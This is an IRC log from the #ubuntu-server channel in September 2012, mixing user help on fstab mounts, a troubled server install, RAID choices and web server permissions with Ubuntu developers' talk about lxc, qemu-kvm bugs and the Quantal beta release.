<lickalott> same same? mount /dev/sdc1: UUID="81204814-775a-4ac8-923b-a6690381fe9b" /media/WHATEVER ?
<lickalott> lemme google first
<skaet> arosales, Daviey, utlemming,  could you take a pass and update what's making it in to Beta 1 (and noting the bits about to land right after), and any key bugs you want to warn folks about.  https://wiki.ubuntu.com/QuantalQuetzal/TechnicalOverview/Beta1
<lickalott> Tellmarch, quick question....   right now sdb is the drive used for boot, swap, etc....  but it was installed against sda.  when I'm setting up fstab, do i want to use the UUID for sdb to mount 1 of my non-os drive?
<lickalott> *drives
<Tellmarch> sda, etc. can change
<Tellmarch> while the UUID doesn't change
<Tellmarch> so you make all the mounting without talking about sda, sdb, etc. at all
<Tellmarch> this way you have no problem
<Tellmarch> you say for instance, UUID 81204814-775a-4ac8-923b-a6690381fe9b will be in /boot, UUID (another) will be in /mnt/disk1, etc.
<Tellmarch> then no matter if it's called sda or sdb, it will be in the same place in your filesystem
<lickalott> okay...i got ya now.
<lickalott> thanks!
<lickalott> can I paste my fstab for you to look at?  i'm getting an error when i mount -a (mount.nfs: remote share not in 'host:dir' format)
<lickalott> http://paste2.org/p/2194616
<arosales> skaet: hello, I'll take a look and add any relevant bits
<skaet> thanks arosales
<uvirtbot> New bug: #1045616 in bind9 (main) "DHCP server handing out DNS server addresses but DHCP client does not write these to resolv.conf" [Undecided,New] https://launchpad.net/bugs/1045616
<lickalott> Tellmarch didn't work.  modified teh fstab, rebooted....no mounts
<smoser> hallyn, around?
<smoser> i've a questoin on lxc.conf
<smoser> http://manpages.ubuntu.com/manpages/precise/man5/lxc.conf.5.html
<smoser> the moutn point section says:
<smoser>  the  path  of the rootfs mount point should be prefixed with  the  /usr/lib/lxc/root  default  path  or  the  value   of lxc.rootfs.mount if specified.
<hallyn> smoser: yes, and while i'm here note that ppa:serge-hallyn/virt should have the fix for your btrfs lxc-destroysymlink woes
<smoser> what does that mean?
<smoser> /usr/lib/lxc/root seems wrong
<hallyn> smoser: i think that's outdated
<hallyn> it's outdated in more ways than one
<hallyn> /usr/lib/lxc/roto is wrong, and it is actually preferred to not prefix the path, rather make it relative
<hallyn> i.e. just 'dev/pts'
<smoser> can i put an entry for / in there?
<smoser> i want to mount / ro
<hallyn> hm.  no
<hallyn> if you're on quantal i'd recommend using a hook.  but you're probably not
<smoser> i could be.
<smoser> you have documentation on "hook" ?
<hallyn> no manpage update for it yet, but documentation is in with the example in the package for now
<hallyn> i.e. /usr/share/lxc/hooks/mountcgroups
<hallyn> smoser: can you just specify /var/lib/lxc/q1/rootfs/ as the target?
<hallyn> or do you not know the container name at the place where you'd need it?
<hallyn> actually,
<smoser> i could specify that as the target, sure. it'd be hacky, but i could do that.
<hallyn> that, or you have to use /usr/lib/x86_64-linux-gnu/lxc
<toabctl> i tried to find the virtual package "apache2-dev" on quantal but it's not available. it's available on precise and on debian. why is it not available on quantal? is this a bug?
<psionicsin> Hey guys. New to Ubuuntu Server. Trying to install it on our server at work due to us getting frustrated with FreeNAS constantly failing. However I'm stuck at the install process. For some reason network autoconfiguration has failed, even though it's connected directly to our router. I have the option of doing it manually or continuing without it. What should I do?
<Tellmarch> the router has a DHCP enabled?
<Tellmarch> it might be a hardware problem...
<Tellmarch> i mean, it might be that the network card isn't handled by ubuntu correctly
<psionicsin> Tellmarch: Well I've tried both the onboard ethernet port, and the PCIe ethernet port in the server and I get the same thing. However if I attempt doing it on one of our workstations that's connected to the same router, it does the DHCP dance just fine and continues on. And our workstations are connected via onboard ethernet ports.
<psionicsin> And might I add that our servers and workstations have the same hardware save for the servers having a crap ton of 2TB HDDs in them
<tgm4883> psionicsin, have you attempted giving it a static IP?
<Tellmarch> you can try the manual configuration and see if you get network access this way
<Tellmarch> but if not, you might have to add a driver or something to recognize your hardware properly
<psionicsin> tgm4883: I'm currently in the very bieginning on installation stages. I still have an 8-16bit screen right now.
<psionicsin> Tellmarch: how would I go about doing it manually. i'm not sure what to look for.
<tgm4883> psionicsin, so? it gave you the option to set it manually
<tgm4883> IMO, all servers should have a static IP anyway
<Tellmarch> maybe you can switch to another console, and see the output of lspci (the line about the network adapter), and maybe dmesg | grep -i eth0 or something...
<Tellmarch> see if everything looks all right there
<psionicsin> tgm4883: Yes. Although I haven't selected it yet, the server always used the IP "192.168.1.68". It then asks for my router gateway. Since we use windows here I did ipconfig in my prompt to find the router gateway and subnet mask. However after all of that it asks for name server address. THIS is what I have no clue about,.
<Tellmarch> DNS?
<Tellmarch> ipconfig /all in windows will tell you the DNS used
<tgm4883> psionicsin, it's asking about the DNS server, do 'ipconfig /all' in windows as Tellmarch has suggested
<tgm4883> likely though, it's the same as your router
<Tellmarch> that depends, it's not the same for my server
<psionicsin> You guys are both right. I'm generally a Mac guy so I'm so lost lol. The DHCP server is also he router so I'm finding it hard to understand why it can't find something it's directly connected to
<psionicsin> Ok now I've made it to where it's asking me to enter the hostname for the system. freenas has been automatically filled in. 0_o
<tgm4883> Tellmarch, while that is true, I sometimes make assumptions based on the technical level of who I'm talking to
<psionicsin> tgm4883, Tellmarch: Is it safe to enter anything into the hostname field? This is just what the server will be called over the network correct?
<Tellmarch> yes, you can choose your name
<tgm4883> psionicsin, my feeling is it is either A) bad cabling/port between the server and the router or B) the NIC in the server isn't recognized by Ubuntu
<tgm4883> psionicsin, yes, but don't use underscore
<psionicsin> Tellmarch: why do you think that the name freenas populated that field before i could enter anything?
<tgm4883> that is the most common mistake I see people do
<psionicsin> tgm4883: do you think cable length has to do with it having a hard time?
<tgm4883> psionicsin, probably not
<tgm4883> unless it is really long
<psionicsin> 100ft
<tgm4883> eg. I think the limit is ~300 ft
<psionicsin> ok
<psionicsin> tgm4883: ok now it's asking for a domain name.Never encountered anything like this with freenas. What exactly is this asking of me?
<tgm4883> psionicsin, in windows, when you do an 'ipconfig /all' do you see anything listed for "Primary DNS suffix"?
<psionicsin> tgm4883, no nothing is listed
<tgm4883> then you can leave that blank
<psionicsin> tmg4883, now I just have a blank purple screen with a white bar at the bottom. no indication of anything going on.
<Tellmarch> well, the fact that the DHCP didn't work was a sign of trouble...
<Tellmarch> can you switch to another console (ctrl alt F2) ?
<Tellmarch> and maybe start by ping www.google.com ?
<psionicsin> Tellmarch, did that. Says www.google.com is alive!
<Tellmarch> so the network is working, at least...
<Tellmarch> I'm not sure what could block the install process then...
<tgm4883> I don't recall what it does after network
<psionicsin> Tellmarch, right. I'm not too savvy on servers and unix/linux systems...but I'm sure a network problem wouldn't stop software from being installed. Seems weird.
<tgm4883> which is odd, as I've installed 3 servers today
<tgm4883> psionicsin, did you verify the checksum of the ISO you downloaded and burnt?
<psionicsin> Is there anything I can type into this console to find out something>
<psionicsin> tgm4883 no...care to inform me how I do that lol?
<Tellmarch> psionicsin, well, the end of dmesg might tell something, sometimes...
<tgm4883> psionicsin, are you running 12.04?
<Tellmarch> like if you see a big ERROR message... but it's not very likely
<tgm4883> yea I'd probably just check dmesg or /var/log/syslog
<tgm4883> see if it's trying to do something
<ehnde> i'm getting 403 forbidden on my web server...does this look correct?
<ehnde> -rw-r--r-- 1 www-data www-data 49 Sep  5 16:27 index.html
<Tellmarch> I also seem to remember there was something in /var/log/installer or something like that
<Tellmarch> ehnde, yes, this should work... what are the permissions on the folder?
<ehnde> Tellmarch: folder permissions are drwxr-xr-x 2 www-data www-data
<tgm4883> ehnde, is that still at /var/www/?
<ehnde> tgm4883: /srv/www
<tgm4883> what are the permissions on /srv
<ehnde> err.../srv/<sitename>
<ehnde> tgm4883: permissions on /srv are drwxr-xr-x
<ehnde> that doesn't look good :|
<Tellmarch> if all the permissions in the tree are like this, it should work...
<tgm4883> yea that looks like it should work
<psionicsin> tgm4883, Tellmarch: no big error messages at all from what I see. Near the end it's talking about eth0 and eth1 (0 is the PCIe card, 1 is onboard). A bunch of "link not ready"s and "link down"s. Ends with eth0 saying "link becomes ready" and then saying no IPV6 routers present.
<ehnde> maybe i still see the 403 because of browser caching
<tgm4883> we're assuming you pointed the apache site at /srv/www/sitename
<Tellmarch> psionicsin, so nothing wrong in dmesg... have you tried the installer log? less /var/log/installer i think
<tgm4883> psionicsin, that all looks fine
<psionicsin> Tellmarch, says les not found
<psionicsin> less*
<Tellmarch> hmm nevermind i remembered wrong
<ehnde> maybe the problem is group ownership
<Tellmarch> during the install it's in the syslog
<ehnde> nginx is running as 'nobody'
<Tellmarch> but everybody can read these files, including "nobody"
<psionicsin> tgm4883, I flipped back to the install screen right quick and still a blank purple screen.
<tgm4883> try hitting enter?
<Tellmarch> psionicsin, you're not running the graphical installer, right?
<tgm4883> Tellmarch, graphical installer doesn't prompt for IP information
<Tellmarch> <haven't installed ubuntu server in too long...>
<psionicsin> Tellmarch I'm running the first option from the moment it booted the CD that said "Install Ubuntu Server". And yes version 12.04
<Tellmarch> what was the last working step?
<Tellmarch> it seems it should go hostname -> timezone -> disk....
<psionicsin> hostname was the last step I beileve
<psionicsin> tgm4883, is regular Ubuntu capable of running as a ROCKSOLID NAS?
<tgm4883> psionicsin, IDK, I don't do that
<tgm4883> I would assume so
<psionicsin> because freenas on this server has always been buggy. You look at it wrong and it drops the mount.
<Tellmarch> regular ubuntu is capable of doing everything that ubuntu server does
<psionicsin> Tellmarch: Would you be able to guide me through installing regular ubuntu to a usb key and using the 4 2TB internals in a RAID5/Z@ config to share with everyone on the network?
<psionicsin> Z2*
<Tellmarch> no, I've never done that :-)
<Tellmarch> but all the packages available in ubuntu server are also in the regular ubuntu distribution
<Tellmarch> the difference is really that ubuntu server install less things by default, and the installer is different (not graphical for the server)
<psionicsin> Tellmarch, ahh ok...this is all so confusing for no reason lol
<tgm4883> software raid?
<Tellmarch> https://help.ubuntu.com/community/ServerFaq#What.27s_the_difference_between_desktop_and_server.3F
<Tellmarch> the difference is explained here
<psionicsin> tgm4883, yesh
<tgm4883> I'm assuming so, since hardware raid would be configured before the OS
<xnox> tgm4883: short answer yes, long answer starts with 'it depends.....'
<tgm4883> xnox, it depends?
<tgm4883> regarding RAID or something else?
<xnox> tgm4883: depending what you count as OS: UEFI/bios, grub, initramfs or real root. Whether the "hardware raid" is actually external hardware raid, or something activated by dmraid/mdadm (e.g. Intel Rapid Storage, DDF, etc).
<xnox> tgm4883: and if your $rootfs is not on raid, you can for example spin it down and shutoff
<tgm4883> xnox, does anyone actually consider dmraid/mdadm hardware raid?
<xnox> if dmraid/mdadm is using external metadata formats (as in _not_ LINUX_RAID_MEMBERS, then why not?!) how is Intel Rapid storage or the industry DDF standard any different from other hardware raids?
 * tgm4883 shrugs
<xnox> you can setup Intel / DDF outside the OS (e.g. on the hardware controllers / bios) as well as from within mdadm/dmraid.
<xnox> it's just an on-disk format and API.
<tgm4883> it's been awhile since I looked at any of that, and it was a bit confusing with hardware raid/software raid/ fake raid
<xnox> I think those names are a bit silly & misguided. With all the TRIM optimisations landing in the kernel and mdadm I am not sure which of the 'three' are better....
<psionicsin> Tellmarch: will I have any trouble installing to USB key? I've never messed with any version of Linux before.
<Tellmarch> you mean you want to run ubuntu from a USB key? in production? on a server?
<Tellmarch> oh, it's just for the raid...
<Tellmarch> only trouble should be that it won't be as fast as running from a hard drive, obviously
<Tellmarch> and well, i'm not sure if the installer does that easily in truth
<Tellmarch> i know it's possible, but never did it
<tgm4883> don't forget to backup your configuration as well
<psionicsin> Tellmarch, yes...just how other NAS's usually do
<tgm4883> since if the usb drive dies, you don't have it replicated anywhere
<psionicsin> tgm4883 ok
<Tellmarch> be careful to install the bootload on the USB
<Tellmarch> i'm not sure what else could be a problem...
<Tellmarch> bootloader*
<Tellmarch> well, don't follow the installer proposed choices, he will want to install on the hard drives he can find
<Tellmarch> you'll have to tell him to use the USB drive
<psionicsin> Tellmarch gotcha
<psionicsin> Tellmarch ok so I selected "Install Ubuntu"...and it's like thinking or something. The Ubuntu 12.04 screen is up with 4 dots that turn white then orange. This system should be faster...
<Tellmarch> have you been waiting for long?
<psionicsin> 7min...?
<Tellmarch> that's long...
<psionicsin> Both these servers have AMD Athlon II X4 and 8GB of RAM on brand new gigabyte boards...this is crazy.
<Tellmarch> what are you installing from?
<psionicsin> CD. Freshly burned
<Tellmarch> well, ubuntu installer *is* slow, but i don't think it should be that slow
<psionicsin> Tellmarch...looks like the cd/dvd drive stopped spinning...
<Tellmarch> ... is it possible that some hardware problem would cause both the FreeNas failures and ubuntu's difficulties to install?
<psionicsin> Tellmarch, possible? Yes. What hardware exactly...have no clue. I'm sure a network issue wouldn't stop a software install. And then I thought maybe the drive was bad...but it's reading everything fine. CPU is fine or else I'd experience dropouts. And RAM was checked ok 3 times today.
<psionicsin> I'm gonna cry.
<psionicsin> My last hope is to use UniUSB to make a bootable USB Key
<arrrghhh> psionicsin, i've just read the last few lines, but it sounds like hardware is in question.  have you run memtest?
<psionicsin> arrrghhh yes 3 times and everything came back ok. Love that name btw...just made that sound
<arrrghhh> 3 times...?
<arrrghhh> how long did you let it run?
<psionicsin> mhm. Been at this since 10am. It's almost 630pm now
<arrrghhh> how long did you let memtest run.
<psionicsin> arrrghhh wasn't keeping track, but around 1hr 15min each time
<arrrghhh> ok that's plenty
<arrrghhh> no colors/errors?
<arrrghhh> it should light up like a christmas tree if there's issues with RAM
<psionicsin> Nope. just white blocks
<psionicsin> arrrghhh, I wonder if it's the mobo. although I can't actually test that.
<arrrghhh> i went back to your original question
<arrrghhh> seems you're having DHCP issues
<arrrghhh> why can't you just skip that and manually configure it later?
<psionicsin> Well I've skipped server and gone directly to regular Ubuntu and it won't even get to the install screen
<arrrghhh> this is new hardware?  nothing but freenas installed on it before?
<psionicsin> 4-5 months old. nothing but freenas before. but then we started getting red lights about failing HDDs. I pulled each and every one of them to check them against my workstation and everything came back clean. Figured FreeNAS was the issue so decided to switch NASs, OMV failed to install correctly, OpenFiler failed to install correctly. So going back to FreeNAS...that now failed to even get to the boot screen.
<psionicsin> So Ubuntu was my last hope OS wise
<psionicsin> arrrghhh
<arrrghhh> psionicsin, i don't know much about freenas
<arrrghhh> but why didn't you check the disks in that box?
<arrrghhh> odd
<psionicsin> arrrghhh I did. pulled them and checked them in my workstation. all clean.
<arrrghhh> no
<arrrghhh> i mean left them in that box
<arrrghhh> and figured out why they were complaining in that box.
<arrrghhh> but if you've ruled out the drives themselves... the only thing i could think of would be hardware
<arrrghhh> s-ata/raid controller bad, etc
<psionicsin> arrrghhh they were giving off smart failures on the storage side of fn
<arrrghhh> did you check to see what type of errors?
<arrrghhh> some errors are indicative of a bad cable for example
<psionicsin> arrrghhh yes...it was saying that the SMART was failing. This is what the GUI was teling me. I'm not a console gy so error numbers and things were out of the question
<psionicsin> On 2 of the 4 drives
<psionicsin> arrrghhh BUT...those drives shouldn't have anything to do with me installing an OS to a USB Key. Those are only used as storage and as such should have nothing to do with the install portion
<arrrghhh> psionicsin, well 'SMART was failing' is not anything i can use.
<arrrghhh> pull the drives then
<psionicsin> arrrghhh yeah I know :(
<arrrghhh> installing ubuntu to a usb key?
<arrrghhh> that doesn't sound like a very good idea
<arrrghhh> installing ubuntu from a usb key is one thing
<arrrghhh> installing it to a usb key - probably not a good idea.  perhaps do-able, but not recommended.
<arrrghhh> i guess those persistent installs from ubuntu desktop work pretty well
<arrrghhh> perhaps you could use a similar concept on the server platform - never tried myself.
<psionicsin> arrrghhh persistent installs?
<arrrghhh> you want to be able to plug in the usb key and boot anywhere, is that why you want to install the OS on a USB key?
<psionicsin> arrrghhh no. We have 4-2TB hard drives that we want to use in an array. With FreeNAS and other NAS-only OSs, you install to a USB/CF card and run from there. I was hoping the same thing could be done with Ubuntu.
<psionicsin>  each server consists of a USB key, and 4-2TB HDDs
<arrrghhh> hrm.  you'd think that would kill the key eventually with all that random read/write
<arrrghhh> but i guess it's not impossible.  have you tried pulling all the array'd drives and only leave the install usb key --> boot?
<psionicsin> Some people have had it running for 4+ years I've heard. others died within 6-9 months
<arrrghhh> also, ubuntu server doesn't have a gui
<arrrghhh> it's cli-only...
<arrrghhh> psionicsin, just be wary of it.
<psionicsin> arrrghhh yeah tried all of that. I did see an improvement after unplugging the DVD drive. Weird.
<arrrghhh> standard usb keys are not like ssd's.
<arrrghhh> improvement after unplugging the dvd drive?  weren't you booting from that?
<psionicsin> brb...gonna look for another HDD...IF we have one
<arrrghhh> ok
<arrrghhh> psionicsin, just know that ubuntu server has no GUI.
<arrrghhh> i don't want you to be disappointed after going through all this work only to be met with a cli login... haha
<psionicsin> arrrghhh I've given up on server, I'm installing desktop currently
<psionicsin> arrrghhh don't have a spare HDD...which means I'll have to use one of the 2TB...seems like a waste
<psionicsin> arrrghhh What kind of RAID would I be able to achieve with just 3 2TB drives?
<arrrghhh> psionicsin, you could do raid5
<arrrghhh> but it's not recommended putting the OS on a RAID array
<psionicsin> arrrghhh no no no...the OS will be on a solitary 2TB drive. The rest of them will be in software raid for distribution accross the network
<arrrghhh> hrm
<arrrghhh> that could work
<arrrghhh> certainly does seem a waste of that last 2tb drive, but hey
<arrrghhh> you haven't tried another usb key?
<arrrghhh> or installing from a usb key have you?
<Tellmarch> don't you have a small SSD you could use for the OS?
<arrrghhh> (if you suspect the optical drive)
<arrrghhh> heh
<Tellmarch> it would be faster than the USB, too :p
<arrrghhh> Tellmarch, i would hope he would start with the ssd if he had one of those just 'lying around'
<psionicsin> arrrghhh would RAID 3 be better than 5? This server is used as a working server that 5-6 machines access. We're a photo studio so we're constantly reading and writing.
<arrrghhh> haha
<arrrghhh> raid3 is useless
<psionicsin> ok
<psionicsin> Tellmarch: nope
<arrrghhh> i've never even heard of anyone using it
<arrrghhh> raid0, 1, 5 or sometimes 6.  6 is complex.
<arrrghhh> there's other variants, like raid10 - but meh.
<psionicsin> arrrghhh we used to use RAID10 in FN7...switched to RAIDZ2 in FN8.
<SpamapS> is 6 really complex?
<SpamapS> not to use
<arrrghhh> no, but to setup
<SpamapS> its just redundant parity
<arrrghhh> raidz3?
<arrrghhh> er
<arrrghhh> z2
<SpamapS> I've used 6.. and it was not any more complex than 5
<arrrghhh> never heard of it.  i'm no RAID expert tho
<psionicsin> wiki claimed z2 was basically a branch of 6
<psionicsin> arrrghhh ok I'm stuck at the Installation Type screen. I've wiped all drives of everything and all are empty yet when I click install now it tells me that there's no partition. I have to do that manually?
<arrrghhh> yes
<arrrghhh> the installer should walk you thru that
<arrrghhh> psionicsin, oh.  raid-z anything isn't really RAID but a redundancy built off zfs.  that's cool
<arrrghhh> but not really possible in linux until all the zfs stuff makes it into the linux kernel and is stable
<arrrghhh> not even sure where that's at
<psionicsin> ok
<psionicsin> arrrghhh what 2TB HDDs would you recommend for a production server? WD seems to fail a lot for us. Haven't tried Seagate yet. I have Samsung at home without any issues.
<Tellmarch> arrrghhh, it's possible to install zfs in linux i think... it's not directly there because of license, that's all
<lickalott> gents, not a total ubuntu-server question but i believe it is due to the NFS from the server...  I have "mapped network drives" on my winblows box from the server.  had a small issue with mounting today.  after i got the mount issue fixed i tried to access the mapped drives and it kills windows explorer.  I can't even right click on them to dc them.  Any ideas?
<SpamapS> lickalott: do you mean NFS, or Samba?
<lickalott> NFS
<SpamapS> lickalott: I wasn't aware windows had an NFS client. :p
<lickalott> well....1 samba and 2 NFS but the samba dc'd no problem
<lickalott> yes sir
<lickalott> it's an add-on in win 7 Ultimate (and one other iirc)
<lickalott> SpamapS, just in case anyone else has this issue - command prompt > net use Z: /delete
<SpamapS> lickalott: ty
#ubuntu-server 2012-09-06
<adam_g> Daviey: what do you think of this approach to eliminating horizon's node.js dependency? https://code.launchpad.net/~gandelman-a/ubuntu/quantal/horizon/1024326/+merge/122982
<adam_g> smoser: ^
<ninjix> anyone knowledgeable about cloud-init in channel?
<ninjix> trying to figure out why my bootcmd sed command isn't running
<ninjix> here's my user-data http://paste.ubuntu.com/1188054/
<ninjix> basically, I'm trying to get the apt-get update to go faster by commenting out the deb-src
<mikal> adam_g: that looks reasonable to me
<adam_g> mikal: oh cool, thanks. i'll push up the actual horizon to gerrit for some review tomorrow.
<adam_g> *actual patch to horizon
<mikal> adam_g: my reading of lessc is that it supports other compressor modes, but I'm very not an expert
<zul> adam_g: looks ok to me although i know less than squat about node.js
<adam_g> mikal: im not either, but what ive gathered is that lessc is one of the supported precompilers that python-compressor can use for doing this kind of stuff. there are others, only one of which is in our main archives, and it requires java. so... i think its just easier to disable by default and make it easy for a user to enable if they want.
<adam_g> zul: cool
<mikal> adam_g: works for me
<zul> adam_g: although lessc should be a suggests if they want to use it
<adam_g> zul: oh, word.
<uvirtbot> New bug: #1046620 in tftp-hpa (main) "tftpd-hpa 5.2-1ubuntu1 failed to purge, exit status 127" [Undecided,New] https://launchpad.net/bugs/1046620
<hallyn> stgraber: I'm going to push lp:~serge-hallyn/ubuntu/quantal/lxc/lxc-fix-getitem-segv to ubuntu:lxc ?
<stgraber> hallyn: sounds good
<stgraber> hallyn: can you also push to your git? I think the utsname fix is in there but not the clear_config one
<hallyn> hm?  yeah, i'll check and push.  thought i had
<hallyn> oh i was probably waiting for testing
<crystalcast> what is ubuntu?
<hallyn> stgraber: done
<stgraber> hallyn: thanks
<hallyn> stgraber: np.  pls let me know if i messed any of it up!
<hallyn> stgraber: did you walk away from ubuntu-devel feeling we should make / ro in ubuntu containers before starting init?
<hallyn> could experiment with adding a lxc.conf option to dothat
<stgraber> if it's not too much trouble, an option might be interesting to better replicate what we have on Ubuntu
<stgraber> but we need to make sure apparmor actually allows that and that it'll work for cases where we use a block device for rootfs
<hallyn> the option is no trouble.  I'm just not sure how it fits in with the rest of the pre-boot mounts that we do
<hallyn> right
<stgraber> I didn't read the whole backlog, so I'm not sure what problem we're trying to fix exactly
<hallyn> eh i can give it a shot.  I'm so far having no luck with userns, wouldn't mind trying something different
<stgraber> and as we'll never run fsck at container boot time (well, at least not for these sharing the fs with the host), I'm not sure I see the point
<hallyn> likewise - but i think it has to do with cloudinit wnating to be able to run when / is mounted, as detected by an upstart event
<stgraber> well, adding the option and seeing what blows up might still be an interesting experiment ;)
<hallyn> obviously subject to FF :)  but easily done in a ppa
<hallyn> all right lemme see
<stgraber> yeah, for now I'm pushing all the new stuff to git for inclusion upstream, then if we see that we really need some of the that in 12.10, we'll just file an FFe
<stgraber> btw, I see you fixed a bug in lxc-destroy (symlinks). highvoltage mentioned to me that apparently lxc-destroy fails when using btrfs, something about trying to rm what's essentially a mount point
<stgraber> I don't have that kind of setup here so I didn't look at fixing it yet, maybe he'll be sending a patch if he gets bored of seeing the failure and having to flush it manually ;)
<hallyn> stgraber: depending on his setup, my fix may fix his
<hallyn> or, his may be an "unsupported" (i.e. nigh upon impossible to guess) setup...
<hallyn> do you know if he'll be at next uds?
<stgraber> hallyn: yep, he'll be there
<hallyn> cool
<ninjix> anyone having slow connections to security.ubuntu.com?
<uvirtbot> New bug: #1022721 in python-greenlet (main) "Switch from python-support to dh_python2" [High,Fix released] https://launchpad.net/bugs/1022721
<tonyyarusso> I seem to be having trouble with user preferences for SpamAssassin.  I'm running 3.3.2 on Ubuntu 12.04 with Postfix 2.9.3 and Amavis 2.6.5, with user preferences stored in a PostgreSQL 9.1 database.  The issue appears to be that those preferences aren't being read or aren't being honored.  For instance, I have a preference of "blacklist_from" with a username of "me@ourdomain.org" and a value of ...
<tonyyarusso> ... "another_address_of_mine@differentdomain.net", and I can still send messages through from the supposedly blocked account.  I do have user_scores_dsn, user_scores_sql_username, user_scores_sql_password, and user_scores_custom_query set (I've tried with and without that last one).  What else should I check?
<hallyn> stgraber: perhaps you should respond to Dan Kegel with your plans to reimplement lxc-start-ephemeral?
<SpamapS> tonyyarusso: that sounds really specific to SpamAssassin .. have you tried their official forums/lists/channel?
<tonyyarusso> SpamapS: I posted a few hours earlier on their IRC, but no sign of life so far.  May have to seek out the other options.
<koolhead17> i all
<koolhead17> *hi
<uvirtbot> New bug: #1046684 in lxc (universe) "debian-templates missed hostname setting" [Undecided,New] https://launchpad.net/bugs/1046684
<Daviey> adam_g: missing a bzr add?
<uvirtbot> New bug: #1046696 in lxc (universe) "lxc-shutdown can not shutdown or reboot debian host" [Undecided,New] https://launchpad.net/bugs/1046696
<uvirtbot> New bug: #1046717 in clamav (main) "package clamav-daemon (not installed) failed to install/upgrade: unable to create `/usr/sbin/clamd.dpkg-new' (while processing `./usr/sbin/clamd'): Permission denied" [Undecided,New] https://launchpad.net/bugs/1046717
<uvirtbot> New bug: #1046771 in qemu-kvm (main) "Time runs too fast" [Undecided,New] https://launchpad.net/bugs/1046771
<n_np> Hello, my nic connects to my network, establishes that its 100 full dublex and rx tx flow control is on, then it just goes down again directly
<n_np> how can i correct this?
<patdk-lap> lack of dhcp?
<briggz> does anyone here have any experience in disabling specific usb ports?
<jamespage> hallyn, can you take a look at bug 1046771 when you start please
<uvirtbot> Launchpad bug 1046771 in qemu-kvm "Time runs too fast" [Undecided,New] https://launchpad.net/bugs/1046771
<jamespage> I know what cjwatson means (feels like that every day to me) :-)
<hallyn> jamespage: hm, ok
<ninjix> I have a 12.04 machine running puppet client that keeps getting a puppet class assigned to it even though I've now set the specific host to it's own node definition
<ninjix> anyone experienced this with Precise?
<jamespage> hallyn, I was able to confirm the symptoms
<hallyn> jamespage: you've not built a package with those commits to test it though right?
<jamespage> hallyn, nope - only just confirmed it
<hallyn> is beta freeze lifted today?
<jamespage> hallyn, once beta is released yes
<hallyn> presumably i can push to -proposed anyway
<hallyn> jamespage: thanks for looking at the suse pkg :)
<ninjix> found my puppet problem, was a lurking include :)
<stgraber> hallyn: yep, will do. Was planning on including his work in the python port anyway.
<hallyn> jamespage: I can' treproduce this though
<hallyn> timeout=10 sleeps for 10 seconds for me
<jamespage> timeout=2000 took about 2 seconds for me
<hallyn> oh, oops.  i'm probably using wrong rtc
<hallyn> hm, no , you're not specifying any
<hallyn> wonder if it's an intel-only bug
<jamespage> might be
<jamespage> I'm using intel
 * hallyn reboots his precise box that was setting up for a cirrus vga bug reproduction
<smb> hallyn the one where it fails to have vts?
<smb> Or better where they are corrupted
<hallyn> smb: bug 1045845
<uvirtbot> Launchpad bug 1045845 in qemu-kvm "12.10 guest crash on login when using 12.04 qemu-kvm with cirrus driver" [Low,Confirmed] https://launchpad.net/bugs/1045845
<hallyn> smb: what are the ones you're talking about?
<smb> bug 1038055
<uvirtbot> Launchpad bug 1038055 in linux "graphics fail to initialise correctly, in kvm with cirrus graphics (after LUKS install)" [High,Confirmed] https://launchpad.net/bugs/1038055
<smb> But they might be relared
<smb> related
<hallyn> could be.
<hallyn> thanks
<smb> I think there is two states racing: sometimes the cirrus driver fails to get the VRAM resources. Then us use the cirrus driver for x
<smb> And that crashes on login
<hallyn> wonderiffic
<smb> (meaning we have that problem with Xen all the time)
<smb> For qemu/kvm the cirrus drm driver exists which then causes the modesetting x driver to be used
<hallyn> meaning it keeps being reintroduced?
<hallyn> oh i see
<smb> That one does work .... s l ooooo w l y
 * smb and unity 3d on VMs are not good friends
<hallyn> smb: yeah, always adds 10 secs to pull up the dash to get an xterm up
<LinuxAdmin> hi everyone
<uvirtbot> New bug: #1046851 in juju (universe) ""juju-origin: lp:juju" fails to install dependencies" [Undecided,New] https://launchpad.net/bugs/1046851
<LinuxAdmin> I've just installed ubuntu server 12.04 and I cannot find some usual files
<LinuxAdmin> I cannot find grub.cfg and /var/log/messages
<LinuxAdmin> is this normal?
<LinuxAdmin> were those files moved to another place?
<smb> LinuxAdmin, messages is /var/log/syslog and grub.cfg should be in /boot/grub
<LinuxAdmin> they are not there
<LinuxAdmin> sorry, syslog is there
<LinuxAdmin> smb, I was trying to open with my unprivileged user
<LinuxAdmin> with root it opens
<LinuxAdmin> thanks smb
<smb> Ah yeah, some files permissions are tightened up
<alaing> Cork How do I write that length selector
<zul> smoser: ping so whats yoru script suppose to prove?
<smoser> i have more than one script
<smoser> one of them is about this computer programmer, who works at night as a maple syrup thief.  I'm shopping that script around, trying to get it into a hollywood movie. but i haven't had any buyers yet.
<zul> asshat
<zul> the ec2 script for the missing dates for ec2
<Pici> hah
<zul> smoser: this bug https://bugs.launchpad.net/bugs/827569
<uvirtbot> Launchpad bug 827569 in nova "ec2metadata service does not include 2011-01-01" [Wishlist,Confirmed]
<stgraber> hallyn: I'll take care of bug 1046684 and bug 1046696
<uvirtbot> Launchpad bug 1046684 in lxc "debian-templates missed hostname setting" [Undecided,New] https://launchpad.net/bugs/1046684
<uvirtbot> Launchpad bug 1046696 in lxc "lxc-shutdown can not shutdown or reboot debian host" [Undecided,New] https://launchpad.net/bugs/1046696
<smoser> zul, its just there for reference, if someone wanted to implement additional EC2 MD.
<zul> smoser:  ah...i see
<stgraber> hallyn: the patches contain typos and need proper splitting, but that's trivial. I'll push to my git branch and to ubuntu:lxc
<smoser> so you dont think my movie idea will work?
<hallyn> stgraber: thanks
<koolhead17> hallyn: hi5
<koolhead17> someone just tested LXC/ Openstack on precise
<hallyn> jamespage: yeah, imeout goes by faster on intel. it only waited 3-5 seconds instead of 10. guess it's very hw specific.  now to build proposed fix
<hallyn> koolhead17: excellent - and it worked great i hope :)
<koolhead17> hallyn: yes. will share the blog on same soon
<hallyn> koolhead17: awesome, thx
<phaidros> how do I map a domain user's primary group ("domain user" from AD) to a local group (gid=33) ?
<hallyn> smb: grasping at straws maybe, but the timekeeping bugs just may be responsible for cirrus bugs, it seems like.  (we'll see)
<smb> hallyn, depends which cirrus bug you mean. :) The one I am looking at right now is because the efi vga frambuffer may not quickly enough release its resources and cirrus giving up quickly when trying to allocate the same mem region
<hallyn> smb: ah.  so that's likely not fixed upstream?
<smb> hallyn, not when I looked last (yesterday)
<smb> hallyn, I am doing a test kernel which you may try
<hallyn> smb: no hurry, i'm not there yet
<stgraber> hallyn: pushed to git and ubuntu branch
<hallyn> stgraber: ubuntu branch is getting scary :)
<stgraber> hallyn: yeah :)
<RoyK> phaidros: idmapd
